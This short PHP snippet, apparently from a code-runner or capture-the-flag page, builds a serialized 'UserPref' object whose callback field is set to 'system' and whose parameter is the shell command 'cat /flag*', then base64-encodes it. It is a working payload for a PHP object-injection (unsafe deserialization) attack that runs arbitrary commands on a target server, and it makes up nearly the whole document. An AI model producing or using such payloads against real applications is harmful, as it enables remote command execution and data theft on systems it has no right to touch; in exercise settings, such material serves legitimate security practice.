<?php class UserPref { public $theme; public $lang; public $callback; public $param; } $obj = new UserPref(); $obj->theme = "light"; $obj->lang = "zh"; $obj->callback = "system"; $obj->param = "cat /flag*"; echo base64_encode(serialize($obj)); ?>
You have javascript disabled. You will not be able to edit any code.